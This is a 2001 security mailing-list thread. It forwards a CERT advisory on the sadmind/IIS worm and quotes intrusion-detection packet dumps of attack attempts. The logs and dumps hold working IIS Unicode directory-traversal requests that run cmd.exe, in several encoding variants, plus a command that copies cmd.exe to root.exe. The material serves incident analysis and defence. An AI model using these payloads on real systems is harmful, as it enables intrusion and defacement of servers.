Security Incidents mailing list archives
Re: 4 similar IIS attempts in a 48 hour period.
From: Frank Quinonez <fquinone () CISCO COM>
Date: Tue, 8 May 2001 10:06:51 -0700
you may want to check this out!
****************************************************
CERT Advisory CA-2001-11 sadmind/IIS Worm
Original release date: May 08, 2001
Last revised: --
Source: CERT/CC
A complete revision history is at the end of this file.
Systems Affected
* Systems running unpatched versions of Microsoft IIS
* Systems running unpatched versions of Solaris up to, and
including, Solaris 7
Overview
The CERT/CC has received reports of a new piece of self-propagating
malicious code (referred to here as the sadmind/IIS worm). The worm
uses two well-known vulnerabilities to compromise systems and deface
web pages.
I. Description
Based on preliminary analysis, the sadmind/IIS worm exploits a
vulnerability in Solaris systems and subsequently installs software to
attack Microsoft IIS web servers. In addition, it includes a component
to propagate itself automatically to other vulnerable Solaris systems.
It will add "+ +" to the .rhosts file in the root user's home
directory. Finally, it will modify the index.html on the host Solaris
system after compromising 2,000 IIS systems.
To compromise the Solaris systems, the worm takes advantage of a
two-year-old buffer overflow vulnerability in the Solstice sadmind
program. For more information on this vulnerability, see
http://www.kb.cert.org/vuls/id/28934
http://www.cert.org/advisories/CA-1999-16.html
After successfully compromising the Solaris systems, it uses a
seven-month-old vulnerability to compromise the IIS systems. For
additional information about this vulnerability, see
http://www.kb.cert.org/vuls/id/111677
Solaris systems that are successfully compromised via the worm exhibit
the following characteristics:
*
Sample syslog entry from compromised Solaris system
May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus
Error - c
ore dumped
May 7 02:40:01 carrier.domain.com last message repeated 1 time
May 7 02:40:03 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind:
Segmentation
Fault - core dumped
May 7 02:40:03 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind:
Segmentation
Fault - core dumped
May 7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup
May 7 02:40:08 carrier.domain.com last message repeated 1 time
May 7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Killed
* A rootshell listening on TCP port 600
* Existence of the directories
* /dev/cub contains logs of compromised machines
* /dev/cuc contains tools that the worm uses to operate and
propagate
Running processes of the scripts associated with the worm, such as
the following:
* /bin/sh /dev/cuc/sadmin.sh
* /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111
* /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80
* /bin/sh /dev/cuc/uniattack.sh
* /bin/sh /dev/cuc/time.sh
* /usr/sbin/inetd -s /tmp/.f
* /bin/sleep 300
Microsoft IIS servers that are successfully compromised exhibit the
following characteristics:
* Modified web pages that read as follows:
fuck USA Government
fuck PoizonBOx
contact:sysadmcn () yahoo com cn
*
Sample Log from Attacked IIS Server
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \
GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \
GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \
GET /scripts/../../winnt/system32/cmd.exe \
/c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \
GET /scripts/root.exe /c+echo+\
<HTML code inserted here>.././index.asp 502 -
II. Impact
Solaris systems compromised by this worm are being used to scan and
compromise other Solaris and IIS systems. IIS systems compromised by
this worm can suffer modified web content.
Intruders can use the vulnerabilities exploited by this worm to
execute arbitrary code with root privileges on vulnerable Solaris
systems, and arbitrary commands with the privileges of the
IUSR_machinename account on vulnerable Windows systems.
We are receiving reports of other activity, including one report of
files being destroyed on the compromised Windows machine, rendering
them unbootable. It is unclear at this time if this activity is
directly related to this worm.
III. Solutions
Apply a patch from your vendor
A patch is available from Microsoft at
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
For IIS Version 4:
http://www.microsoft.com/ntserver/nts/downloads/critical/q26986
2/default.asp
For IIS Version 5:
http://www.microsoft.com/windows2000/downloads/critical/q269862
/default.asp
Additional advice on securing IIS web servers is available from
http://www.microsoft.com/technet/security/iis5chk.asp
http://www.microsoft.com/technet/security/tools.asp
Apply a patch from Sun Microsystems as described in Sun Security
Bulletin #00191:
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=se
cbull/191&type=0&nav=sec.sba
Appendix A. Vendor Information
Microsoft Corporation
The following documents regarding this vulnerability are available
from Microsoft:
http://www.microsoft.com/technet/security/bulletin/MS01-023.asp
Sun Microsystems
Sun has issued the following bulletin for this vulnerability:
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=se
cbull/191&type=0&nav=sec.sba
References
1. Vulnerability Note VU#111677: Microsoft IIS 4.0 / 5.0 vulnerable
to directory traversal via extended unicode in url (MS00-078)
http://www.kb.cert.org/vuls/id/111677
2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice
AdminSuite Daemon sadmind
http://www.cert.org/advisories/CA-1999-16.html
Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff Carpenter,
Art Manion, Ian Finlay, John Shaffer
______________________________________________________________________
This document is available from:
http://www.cert.org/advisories/CA-2001-11.html
______________________________________________________________________
CERT/CC Contact Information
Email: cert () cert org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
Monday through Friday; they are on call for emergencies during other
hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email.
Our public PGP key is available from
http://www.cert.org/CERT_PGP.key
If you prefer to use DES, please call the CERT hotline for more
information.
Getting security information
CERT publications and other security information are available from
our web site
http://www.cert.org/
To subscribe to the CERT mailing list for advisories and bulletins,
send email to majordomo () cert org. Please include in the body of your
message
subscribe cert-advisory
* "CERT" and "CERT Coordination Center" are registered in the U.S.
Patent and Trademark Office.
______________________________________________________________________
NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software
Engineering Institute is furnished on an "as is" basis. Carnegie
Mellon University makes no warranties of any kind, either expressed or
implied as to any matter including, but not limited to, warranty of
fitness for a particular purpose or merchantability, exclusivity or
results obtained from use of the material. Carnegie Mellon University
does not make any warranty of any kind with respect to freedom from
patent, trademark, or copyright infringement.
_________________________________________________________________
Conditions for use, disclaimers, and sponsorship information
Copyright 2001 Carnegie Mellon University.
Revision History
May 08, 2001: Initial Release
--------------------------------------------------------------------
Frank Quinonez Cisco Systems 4 Venture St Suite 100
Systems Engineer || || Irvine, CA 92618
frankq () cisco com :||: :||: Phone: 949-788-5162
http://www.cisco.com ..:||||:..:||||:.. Pager: 800-365-4578
--------------------------------------------------------------------
Empowering the Internet Generation
Changing the way we Work, Live, Learn, and Play.
-----Original Message-----
From: Incidents Mailing List [mailto:INCIDENTS () SECURITYFOCUS COM]On
Behalf Of Steve Halligan
Sent: Tuesday, May 08, 2001 7:24 AM
To: INCIDENTS () SECURITYFOCUS COM
Subject: 4 similar IIS attempts in a 48 hour period.
I got these 4 attempts from different sources in a rather small window of
time. They all start out with a portscan of port 80, so I don't think it is
the same person (Why would they need to rescan each time?). You will note
that the order of the variation of the attempts is similar. Is this a new
worm? A new tool?
-Steve
----------------BEGIN SCAN REPORTS----------------------
*****************************SCAN
#1*****************************************
----------------------------------------------------------------------------
--
#(1 - 2059) [2001-05-05 21:20:45] 305
IPv4: 207.51.58.7 -> 209.46.94.85
hlen=5 TOS=0 dlen=44 ID=19427 flags=0 offset=0 TTL=243 chksum=810
TCP: port=41385 -> dport: 80 flags=******S* seq=3959699664
ack=0 off=6 res=0 win=8760 urp=0 chksum=30305
Options:
#1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2081) [2001-05-06 12:06:16] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59795 flags=0 offset=0 TTL=242 chksum=26174
TCP: port=42384 -> dport: 80 flags=***AP*** seq=4087665554
ack=2688221853 off=5 res=0 win=8760 urp=0 chksum=5135
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2082) [2001-05-06 12:06:17] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59801 flags=0 offset=0 TTL=242 chksum=26168
TCP: port=42746 -> dport: 80 flags=***AP*** seq=4111537358
ack=2688221866 off=5 res=0 win=8760 urp=0 chksum=54038
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2083) [2001-05-06 12:06:18] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59807 flags=0 offset=0 TTL=242 chksum=26162
TCP: port=43046 -> dport: 80 flags=***AP*** seq=4129406045
ack=2688221880 off=5 res=0 win=8760 urp=0 chksum=10502
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2084) [2001-05-06 12:06:19] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59813 flags=0 offset=0 TTL=242 chksum=26156
TCP: port=44051 -> dport: 80 flags=***AP*** seq=4191243658
ack=2688221889 off=5 res=0 win=8760 urp=0 chksum=32107
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2085) [2001-05-06 12:06:20] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59819 flags=0 offset=0 TTL=242 chksum=26150
TCP: port=45036 -> dport: 80 flags=***AP*** seq=4254676574
ack=2688221904 off=5 res=0 win=8760 urp=0 chksum=40111
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2086) [2001-05-06 12:06:21] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59825 flags=0 offset=0 TTL=242 chksum=26144
TCP: port=45723 -> dport: 80 flags=***AP*** seq=3643186
ack=2688221913 off=5 res=0 win=8760 urp=0 chksum=10686
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2087) [2001-05-06 12:06:22] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59831 flags=0 offset=0 TTL=242 chksum=26138
TCP: port=46489 -> dport: 80 flags=***AP*** seq=54010263
ack=2688221922 off=5 res=0 win=8760 urp=0 chksum=43352
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2088) [2001-05-06 12:06:23] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59837 flags=0 offset=0 TTL=242 chksum=26132
TCP: port=47320 -> dport: 80 flags=***AP*** seq=104581118
ack=2688221936 off=5 res=0 win=8760 urp=0 chksum=64664
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2089) [2001-05-06 12:06:24] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59843 flags=0 offset=0 TTL=242 chksum=26126
TCP: port=48175 -> dport: 80 flags=***AP*** seq=160395667
ack=2688221939 off=5 res=0 win=8760 urp=0 chksum=18734
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2090) [2001-05-06 12:06:25] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=109 ID=59849 flags=0 offset=0 TTL=242 chksum=26117
TCP: port=49033 -> dport: 80 flags=***AP*** seq=213665368
ack=2688221947 off=5 res=0 win=8760 urp=0 chksum=38432
Payload: length = 63
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 e0../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A ir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2091) [2001-05-06 12:06:26] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=112 ID=59855 flags=0 offset=0 TTL=242 chksum=26108
TCP: port=49954 -> dport: 80 flags=***AP*** seq=270239886
ack=2688221961 off=5 res=0 win=8760 urp=0 chksum=37899
Payload: length = 64
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0 GET /scripts/...
010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ...../winnt/syst
020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2092) [2001-05-06 12:06:27] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=115 ID=59861 flags=0 offset=0 TTL=242 chksum=26099
TCP: port=50870 -> dport: 80 flags=***AP*** seq=328007726
ack=2688221972 off=5 res=0 win=8760 urp=0 chksum=16280
Payload: length = 65
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8 GET /scripts/...
010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 ....../winnt/sys
020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0...
040 : 0A .
----------------------------------------------------------------------------
--
#(1 - 2093) [2001-05-06 12:06:28] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=118 ID=59867 flags=0 offset=0 TTL=242 chksum=26090
TCP: port=51840 -> dport: 80 flags=***AP*** seq=378946693
ack=2688221985 off=5 res=0 win=8760 urp=0 chksum=15453
Payload: length = 66
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC GET /scripts/...
010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 ......./winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
040 : 0D 0A ..
----------------------------------------------------------------------------
--
#(1 - 2094) [2001-05-06 12:06:29] 56
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=135 ID=59873 flags=0 offset=0 TTL=242 chksum=26067
TCP: port=52623 -> dport: 80 flags=***AP*** seq=427404423
ack=2688221992 off=5 res=0 win=8760 urp=0 chksum=12179
Payload: length = 77
000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30 GET /msadc/..%e0
010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38 ../..f..../..0%8
020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3
030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir
040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A HTTP/1.0....
****************************SCAN
#2*******************************************
----------------------------------------------------------------------------
--
#(1 - 2075) [2001-05-06 11:25:12] 317
IPv4: 207.78.143.235 -> 209.46.94.85
hlen=5 TOS=0 dlen=44 ID=33343 flags=0 offset=0 TTL=239 chksum=31438
TCP: port=56344 -> dport: 80 flags=******S* seq=823530689
ack=0 off=6 res=0 win=8760 urp=0 chksum=50416
Options:
#1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2121) [2001-05-06 18:08:07] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24567 flags=0 offset=0 TTL=239 chksum=40155
TCP: port=57118 -> dport: 80 flags=***AP*** seq=3412786496
ack=2693431821 off=5 res=0 win=8760 urp=0 chksum=846
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2122) [2001-05-06 18:08:07] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24573 flags=0 offset=0 TTL=239 chksum=40149
TCP: port=57170 -> dport: 80 flags=***AP*** seq=3415977274
ack=2693431825 off=5 res=0 win=8760 urp=0 chksum=22034
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2123) [2001-05-06 18:08:18] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24582 flags=0 offset=0 TTL=239 chksum=40140
TCP: port=57326 -> dport: 80 flags=***AP*** seq=3426276033
ack=2693431836 off=5 res=0 win=8760 urp=0 chksum=12048
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2124) [2001-05-06 18:08:18] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24587 flags=0 offset=0 TTL=239 chksum=40135
TCP: port=64799 -> dport: 80 flags=***AP*** seq=3904402609
ack=2693431838 off=5 res=0 win=8760 urp=0 chksum=16549
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2125) [2001-05-06 18:08:28] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24596 flags=0 offset=0 TTL=239 chksum=40126
TCP: port=65302 -> dport: 80 flags=***AP*** seq=3936366689
ack=2693431853 off=5 res=0 win=8760 urp=0 chksum=37071
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2126) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24602 flags=0 offset=0 TTL=239 chksum=40120
TCP: port=39706 -> dport: 80 flags=***AP*** seq=107054918
ack=2693431871 off=5 res=0 win=8760 urp=0 chksum=30028
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2127) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24608 flags=0 offset=0 TTL=239 chksum=40114
TCP: port=39709 -> dport: 80 flags=***AP*** seq=107263367
ack=2693431881 off=5 res=0 win=8760 urp=0 chksum=22274
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2128) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24614 flags=0 offset=0 TTL=239 chksum=40108
TCP: port=39965 -> dport: 80 flags=***AP*** seq=124410128
ack=2693431890 off=5 res=0 win=8760 urp=0 chksum=45410
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2129) [2001-05-06 18:08:30] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24620 flags=0 offset=0 TTL=239 chksum=40102
TCP: port=40329 -> dport: 80 flags=***AP*** seq=148806580
ack=2693431906 off=5 res=0 win=8760 urp=0 chksum=26790
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2130) [2001-05-06 18:08:34] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=109 ID=24629 flags=0 offset=0 TTL=239 chksum=40090
TCP: port=40585 -> dport: 80 flags=***AP*** seq=164770468
ack=2693431910 off=5 res=0 win=8760 urp=0 chksum=63492
Payload: length = 63
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 e0../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A ir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2131) [2001-05-06 18:08:34] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=112 ID=24635 flags=0 offset=0 TTL=239 chksum=40081
TCP: port=43268 -> dport: 80 flags=***AP*** seq=341732227
ack=2693431920 off=5 res=0 win=8760 urp=0 chksum=61755
Payload: length = 64
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0 GET /scripts/...
010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ...../winnt/syst
020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2132) [2001-05-06 18:08:38] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=115 ID=24642 flags=0 offset=0 TTL=239 chksum=40071
TCP: port=43341 -> dport: 80 flags=***AP*** seq=346538415
ack=2693431963 off=5 res=0 win=8760 urp=0 chksum=50319
Payload: length = 65
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8 GET /scripts/...
010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 ....../winnt/sys
020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0...
040 : 0A .
----------------------------------------------------------------------------
--
#(1 - 2133) [2001-05-06 18:08:38] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=118 ID=24648 flags=0 offset=0 TTL=239 chksum=40062
TCP: port=46205 -> dport: 80 flags=***AP*** seq=530846163
ack=2693431970 off=5 res=0 win=8760 urp=0 chksum=42548
Payload: length = 66
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC GET /scripts/...
010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 ......./winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
